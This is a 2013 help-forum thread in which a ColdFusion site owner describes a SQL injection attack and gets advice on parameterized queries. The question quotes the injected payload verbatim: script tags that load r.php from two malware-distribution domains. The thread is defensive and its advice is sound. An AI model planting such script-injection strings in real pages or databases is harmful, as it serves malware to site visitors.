Solved

SQL injection attack on windows 2000 server, coldfusion site

Posted on 2013-01-22
4
571 Views
Last Modified: 2013-01-22
Hello,
  We have a Coldfusion site that has been attacked. It is on a windows 2000 server running coldfusion 5 and I need to know how to find and get rid of the malicious code. I have changed the cfquery tag to include cfqueryparam but that has not helped. Currently users are periodically getting this error:

Danger: Malware Ahead!
Google Chrome has blocked access to this page on www.ourweburl.net
Content from hgbyju.com, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.

I cannot locate any tools that will run on the server and malwarebytes did not find anything. Any assistance would be greatly appreciated.

I just found where the malicious code was placed in our table and removed it but how do I prevent it from returning?   Here is what had been entered into one of the columns on multiple records.
              </title><script src=http://hgbyju.com/r.php ></script>                 </title><script src=http://nmmkmm.com/r.php ></script>
0
Comment
Question by:jdines
  • 2
  • 2
4 Comments
 
LVL 32

Expert Comment

by:Big Monty
Comment Utility
to prevent the code from coming back, you're going to need to alter your code to either sanitize your data inputs or use prepared sql queries:

http://stackoverflow.com/questions/60174/how-to-prevent-sql-injection-in-php

it'll take some time but will ultimately save you these types of headaches when they occur.
0
 

Author Comment

by:jdines
Comment Utility
Hello,
  My page is actually a Coldfusion page so I searched how to prevent sql injection in coldfusion and came up with this:

http://stackoverflow.com/questions/2592700/how-do-i-prevent-sql-injection-with-coldfusion

I have actually already updated the queries so will this take care of future problems? Thanks.
0
 
LVL 32

Accepted Solution

by:
Big Monty earned 500 total points
Comment Utility
that should take of it, unless you have other open avenues to your data
0
 

Author Closing Comment

by:jdines
Comment Utility
Thank you very much!
0

Featured Post

Better Security Awareness With Threat Intelligence

See how one of the leading financial services organizations uses Recorded Future as part of a holistic threat intelligence program to promote security awareness and proactively and efficiently identify threats.

Join & Write a Comment

Healthcare organizations in the United States must adhere to the guidance of both the HIPAA (Health Insurance Portability and Accountability Act) and HITECH (Health Information Technology for Economic and Clinical Health Act) for securing and protec…
Big data transfers via information superhighways require special attention and protection. Learn more about the IT-regulations of the country where your server is located. Analyze cloud providers and their encryption systems for safe data transit. S…
Viewers will learn how to use the UPDATE and DELETE statements to change or remove existing data from their tables. Make a table: Update a specific column given a specific row using the UPDATE statement: Remove a set of values using the DELETE s…
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…

772 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

16 Experts available now in Live!

Get 1:1 Help Now